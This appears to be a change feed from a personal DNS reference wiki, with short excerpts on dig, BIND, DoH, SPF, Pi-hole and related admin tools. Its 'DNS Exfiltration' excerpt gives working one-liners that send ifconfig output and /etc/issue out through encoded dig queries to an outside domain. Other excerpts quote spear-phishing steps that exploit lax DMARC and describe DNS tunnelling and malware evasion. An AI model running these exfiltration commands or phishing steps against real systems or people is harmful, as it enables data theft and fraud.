https://www.staffordnet.uk/ 2026-04-05T18:25:39+00:00 https://www.staffordnet.uk/ https://www.staffordnet.uk/lib/exe/fetch.php?media=favicon.ico text/html 2026-03-08T18:39:57+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:active_directory_dns&rev=1772995197&do=diff DHCPING Send a DHCP request to DHCP server to see if it's up and running dhcping man page * -v Verbose, print some information. * -i Use DHCPINFORM packets. (DHCPINFORM is used by client with Static IP that just wants the DHCP Options. i.e. configuration) * text/html 2025-12-15T12:43:22+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:bind_configure_guide&rev=1765802602&do=diff Configure BIND on Linux WINDOWS GUIDE AT BOTTOM OF PAGE. Remember, if you are using two BIND DNS servers in a master/slave configuration, you must update the serial number of the zone file when you update the file on the master if you want the slave to pick it up. text/html 2025-06-02T16:51:52+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:delegation&rev=1748883112&do=diff Delegation NIOS Delegation Remember, if you are migrating a DNS server that has a delegation, the DNS export may not have the appropriate records and you will need to create the appropriate A records after delivery. For example. Supposing you have a Microsoft DNS text/html 2026-01-30T16:02:52+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:dig&rev=1769788972&do=diff DIG Quick Dig dig +short TXT o-o.myaddr.l.google.com @ns1.google.com dig +noall +answer +ttlunits A www.example.com @1.1.1.1 Flags * qr - query reponse. we are getting a respone to our query * rd - recursion desired. we are saying want the server to always get. text/html 2024-03-25T21:11:17+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:dmarc&rev=1711401077&do=diff DMARC Spoofing From this LinkedIn post How to spear phish someone in 2024 even if SPF is enabled and active * Verify Target's DMARC “p” flag is set to “none” (many are!) * Buy a closely related official-sounding domain name (~ $12) * Create a Linux VM or cloud-based VPS text/html 2025-05-09T13:18:54+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:dnssec&rev=1746796734&do=diff DNSSEC Test Sites Sites With Good DNSSEC Signatures * internetsociety.org * dnssec-tools.org * dnssec-deployment.org * sigok.ippacket.stream as per this page If you are testing web validation, the addresses are: * <http://www.internetsociety.org/> * <http://www.dnssec-tools.org/> * <http://www.dnssec-deployment.org/> Sites With Bad DNSSEC Signatures text/html 2023-11-29T15:02:42+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:dns_exfiltration&rev=1701270162&do=diff DNS Exfiltration Demo Guide here Base64 Base64. Contains uppercase letters and defaults to allowing = and / etc. This is not recommended as it can make it easier to detect attacks as 'normal' DNS doesn't use these. Use Base32 instead. However, Base32 isn't available natively in many scripting toolsets. Base64 is. So some attackers use Base64 to avoid having to write their own Base32 conversion code. text/html 2024-01-09T14:02:06+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:dns_record_types&rev=1704808926&do=diff DNS Record Types List here text/html 2026-02-09T11:07:20+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:dns_servers&rev=1770635240&do=diff DNS Public DoH Servers * Crypt0rr * <https://raw.githubusercontent.com/crypt0rr/public-doh-servers/main/dns.list> * <https://raw.githubusercontent.com/crypt0rr/public-doh-servers/main/ipv4.list> * <https://raw.githubusercontent.com/crypt0rr/public-doh-servers/main/ipv6.list> * Curl Project List * The Great Wall * <https://raw.githubusercontent.com/Sekhan/TheGreatWall/master/TheGreatWall.txt> * <https://forum.nxfilter.org/tips-tricks/2723-list-of-dns-over-https-doh-ser… text/html 2022-11-23T12:49:42+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:dns_size&rev=1669207782&do=diff DNS Size DNS Size Article text/html 2022-11-23T12:49:42+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:dns_transfer&rev=1669207782&do=diff DNS Transfer To enable other DNS server IP Addresses to get copies of a zone in Windows, add those IP addresses to the zone permission dnscmd server2016.linux.sub /zoneresetsecondaries linux.sub /securelist 10.1.1.1 10.1.1.206 You will need to edit the properties of the zoneand set text/html 2024-09-07T09:32:13+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:dog&rev=1725701533&do=diff DOG Homepage: <https://dns.lookup.dog/> GitHub: <https://github.com/ogham/dog> mkdir dog cd dog wget https://github.com/ogham/dog/releases/download/v0.1.0/dog-v0.1.0-x86_64-unknown-linux-gnu.zip sudo apt install zip unzip dog-v0.1.0-x86_64-unknown-linux-gnu.zip wget http://nz2.archive.ubuntu.com/ubuntu/pool/main/o/openssl/libssl1.1_1.1.1f-1ubuntu2_amd64.deb sudo dpkg -i libssl1.1_1.1.1f-1ubuntu2_amd64.deb ./bin/dog -H @https://dns.google/dns-query lookup.dog text/html 2025-07-28T20:58:39+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:dot_doh&rev=1753736319&do=diff DoT DoH Firefox Canary domain. If it returns an IP, DoH will be used use-application-dns.net Public list of DoH servers. Google DoH Official documentation Interactive web page here. Add -v for verbose mode. curl -H "accept: application/dns-json" "https://dns.google/resolve?name=www.google.com&type=A" Note: There is also a human-friendly web interface at text/html 2024-04-11T09:48:41+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:dynamic_dns&rev=1712828921&do=diff Dynamic DNS Dynamic updates take priorities over normal queries. High rate of dynamic updates will cause stop to normal queries Register Dynamic DNS Use the command register-dnsclient in PowerShell or ipconfig /registerdns on the CMD to get the Windows client to register itself (or try to) in the appropriate text/html 2023-01-13T11:06:50+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:exfiltration&rev=1673608010&do=diff DNS Exfiltration Data source here. Set DNS domain and subdomain dns_server=domain.uk dns_name=5lz802ad6a7xz6c2izvq1hp6 STDOUT Command ifconfig | base32 -w 63 | tr -d = | while read a; do dig +short $a.$dns_name.$dns_server; done; Exfiltrate File base32 -w 63 < /etc/issue | tr -d = | while read a; do dig $a.$dns_name.$dns_server; done; text/html 2023-02-23T14:13:40+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:hexdump&rev=1677161620&do=diff Hexdump Linux tool that can be used to convert normal text to Hexadecimal. cat filename.txt | hexdump -e '27/1 "%02x" "\n"' text/html 2023-02-23T14:09:41+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:host&rev=1677161381&do=diff Host The host command is very similar to dig. However, the output is simpler and it will use the search domains in resolv.conf, whereas dig does not by default. Example from here $ host foo foo.myfqdn.com has address 10.1.2.3 $ dig +short foo # (no result) $ dig +short +search foo 10.1.2.3 text/html 2022-11-23T12:49:42+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:internal_tld&rev=1669207782&do=diff Internal DNS TLD Officially, you can use the following internally * .test * .example * .invalid * .localhost .local is used for mDNS (multicast DNS) so don't use it (though you will probably get away with using it if you are lucky). SAC 045 (see more info text/html 2023-01-16T09:10:56+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:kdig&rev=1673860256&do=diff KDIG KDig is part of Knot DNS. Install KDIG sudo apt install knot-dnsutils KDIG Manual Manual here. Use KDIG Lookup the IP(s) associated with a hostname (A records): kdig example.com Specify a specific DNS server to query (e.g. Google DNS): kdig example.com @8.8.8.8 text/html 2022-11-23T12:49:42+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:linux_dns_search&rev=1669207782&do=diff Configure DNS Search Path sudo vi /etc/resolvconf/resolv.conf.d/base Add search example.local Then run resolvconf -u You can also add this to DHCP reply option text/html 2025-01-20T09:32:00+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:microsoft&rev=1737365520&do=diff Microsoft DNS From here. PowerShell DNS Get-DnsClientServerAddress | Select-Object -ExpandProperty ServerAddresses DDNS If clients are doing DDNS: * Windows clients update their DNS name once a day. * Windows domain controllers update their DNS text/html 2024-08-21T14:33:44+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:multimaster_dns&rev=1724250824&do=diff Multi-Master DNS NIOS Multi Master Multi-Master is simply setting more than one server as “Grid Primary”. In general, you set one to “Grid Primary” and the others to “Grid Secondary”. If you set multiple to Grid Primary, any Grid Secondary will, at configuration or editing in the name server group, allow you to set the preferred primary via automatic selection or manual process. text/html 2023-03-24T16:03:53+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:nextdns&rev=1679673833&do=diff NextDNS Install sh -c "$(curl -sL https://nextdns.io/install) NextDNS installed and started using systemd init Congratulations! NextDNS is now installed. To upgrade/uninstall, run this command again and select the approriate option. You can use the nextdns command to control the daemon. Here is a few important commands to know: text/html 2023-11-16T19:37:15+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:nslookup&rev=1700163435&do=diff DNS NSLookup This is a Windows tool. Remember, nslookup uses DNS suffix searches first and so may get timeouts. DIG is better. Use a . at the end of the query (e.g. google.com.) to force the ignoring of DNS suffix search. To lookup TXT Records nslookup -q=TXT tester.jbstafford.co.uk 8.8.8.8 text/html 2022-11-23T12:49:42+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:nsupdate&rev=1669207782&do=diff NSUPDATE Tool to manually update DNS zones that allow dynamic updates. More data here. # nsupdate > server 192.168.1.1 > update delete newhost.example.co A > update add newhost.example.com 86400 A 172.16.1.1 > send Rember, to protect static records or protected records in Infoblox text/html 2025-08-21T22:16:54+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:pi_hole_lists&rev=1755814614&do=diff Pi Hole DNS Block Lists Default https://raw.githubusercontent.com/StevenBlack/hosts/master/hosts https://dbl.oisd.nl https://dbl.oisd.nl/light/ http://sysctl.org/cameleon/hosts https://s3.amazonaws.com/lists.disconnect.me/simple_tracking.txt https://s3.amazonaws.com/lists.disconnect.me/simple_ad.txt text/html 2025-08-24T17:13:05+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:protective_dns&rev=1756055585&do=diff Protective DNS UK The PDNS was first launched in 2017 and protects against Domain Name System (DNS) misuse and cyber threats like malware. It has been freely available to organisations like central government, local authorities, and devolved administrations for several years. Organisations that can now sign up to PDNS for Schools are local authorities or eligible public sector networks from the devolved administrations of the UK that provide text/html 2023-03-10T22:28:34+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:public_suffix&rev=1678487314&do=diff Public Suffix A public suffix is a set of DNS names or wildcards concatenated with dots. It represents the part of a domain name which is not under the control of the individual registrant. Public suffixes are often privately owned. blogspot.com and text/html 2023-09-08T14:00:07+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:punycode&rev=1694181607&do=diff Punycode From this link on the Register. An insecure web browser will show apple.com when you hover the mouse over this link. To fix this in Firefox, go to about:config and set the following two values to true * network.IDN_show_punycode * network.standard-url.punycode-host text/html 2025-03-04T09:10:15+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:python&rev=1741079415&do=diff DNS Python import socket import dns.resolver # Basic query for rdata in dns.resolver.resolve('www.yahoo.com', 'CNAME') : print(rdata.target) # Set the DNS Server resolver = dns.resolver.Resolver() resolver.nameservers=[socket.gethostbyname('ns1.cisco.com')] for rdata in dns.resolver.resolve('www.yahoo.com', 'CNAME') : print(rdata.target) text/html 2025-10-09T22:22:42+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:rdap&rev=1760048562&do=diff RDAP See whois text/html 2024-10-27T17:22:26+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:route53&rev=1730049746&do=diff Route53 Route 53 is a domain reseller for the Amazon Registrar and its registrar associate, Gandi. Because Route 53 is the reseller for Amazon Registrar and its registrar associate, GoDaddy, Route 53 is required to send the domain information to the registrar. text/html 2024-03-31T19:22:25+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:setup_dns&rev=1711912945&do=diff Setup DNS GitHub Guide here. text/html 2023-04-06T06:00:33+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:spf&rev=1680760833&do=diff SPF Records Consider staying below 10 FQDN lookups within a SPF record. If you go above this, most SPF checks will show errors (even if they still work). You can include IP addresses once you have gone above the 10 FQDN limit. However, remember that these entries will be static and, like most static IP addresses, might change without warning. text/html 2024-12-27T15:31:22+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:stories&rev=1735313482&do=diff Stories When Facebook withdrew all their routes to their DNS gear in Oct 2021 because their DNS restarts/fix scripts depending on DNS - every major university and large enterprise started having DNS issues with all domains because of the recursion load due to Facebook no longer being in cache. text/html 2024-01-31T00:16:41+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:stub_zones&rev=1706660201&do=diff Stub Zones Forwarding implies that the destination will do recursion on the client's behalf should it be necessary in order to resolve any further sub-delegation under that apex. Stubs basically just short cut the normal recursion process for the given zone by keeping the NS info in cache so that it doesn't need to be recursed on demand to contact the NS list. text/html 2024-10-27T17:20:54+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:terms&rev=1730049654&do=diff DNS Terms Admin Registrant A registrant, also known as a domain name registrant, is the person or entity that registers a domain name. Registrants can either register their domain with a reseller or directly with a registrar. After registering a domain name, the registrant enters a contract with the registrar or reseller if the registrant works with a third-party entity to register their domain. text/html 2022-11-23T12:49:42+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:threats&rev=1669207782&do=diff DNS Threats InvisiMole would pad queries with collections of 'a' to reduce the entropy of the query. Analasys will look at two and three letter pairings. E.G. 'ed' is often seen together. 'qx' not so much. Malware will query an A record that will be the checksum of the next query that is the TXT record (data chunk). text/html 2024-04-13T19:24:24+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:tld&rev=1713036264&do=diff DNS TLD Top Level Domain ISO 3166 is for country level TLD (ccTLD) Public suffix list is the list of domains considered TLD text/html 2023-01-13T12:56:37+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:tools&rev=1673614597&do=diff DNS Tools * DNSMonitor - Mac DNS Monitor * hosts-blocklist - GitHub list of ioc text/html 2025-11-08T14:41:32+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:troubleshooting&rev=1762612892&do=diff Troubleshooting Test DNS TCP $ dig +short melbourneit.net. NS ns4.melbourneit.net. ns1.melbourneit.net. ns3.melbourneit.net. ns2.melbourneit.net. $ (for NS in $(dig +short melbourneit.net. NS | sort); do dig +noall +answer +nottl "$NS" A "$NS" AAAA | sort; done) ns1.melbourneit.net. IN A 203.55.142.15 ns2.melbourneit.net. IN A 203.55.143.15 ns3.melbourneit.net. IN A 203.55.142.16 ns4.melbourneit.net. IN A 203.55.143.16 text/html 2023-07-13T15:23:43+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:tsig&rev=1689261823&do=diff TSIG Generate a tsig key on windows with the following command tsig-keygen text/html 2022-11-23T12:49:42+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:tunneling&rev=1669207782&do=diff DNS Tunneling Infiltration You can use TXT lookups to get data in to an organisation. You can use the following PowerShell scripts to convert Base64 into Binary. $plainText = "Hello World" $sanitisedPlainText = [System.Text.Encoding]::UTF8.GetBytes($plaintext) $base64Text = [System.Convert]::ToBase64String($sanitisedPlainText) $base64Text $newPlainText = [System.Convert]::FromBase64String($base64Text) $newSanitisedPlainText = [System.Text.Encoding]::UTF8.GetString($newPlainText) $newSanitise… text/html 2025-04-22T06:59:42+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:views&rev=1745305182&do=diff DNS Views ISC Understanding views in BIND 9, with examples. text/html 2023-03-01T07:54:31+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:whitelist&rev=1677657271&do=diff DNS Whitelist *.time.akamai.com *.bbc.co.uk *.bbci.co.uk *.bbctvapps.co.uk *.nextdns.io *.redditmail.com *.urldefense.com *.slashdot.org The following domain is used by the Windows OS to check if it can access the Internet dns.msftncsi.com It will return text/html 2025-10-09T22:23:14+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:whois&rev=1760048594&do=diff DNS WhoIS <https://deployment.rdap.org/> <https://rdap.centralnic.com/com/> text/html 2024-05-08T10:56:21+00:00 Anonymous (anonymous@undisclosed.example.com) https://www.staffordnet.uk/doku.php?id=dns:zero_trust_dns&rev=1715165781&do=diff Zero Trust DNS * Microsoft Announcment - 2 May 2024 * Microsoft Clarifications - 2 May 2024 * Josh Kuo blog post - 4 May 2024 * Ars Technica Article - 4 May 2024 * SIDN Labs - 20 Sep 2021 * Adam Networks - June 2022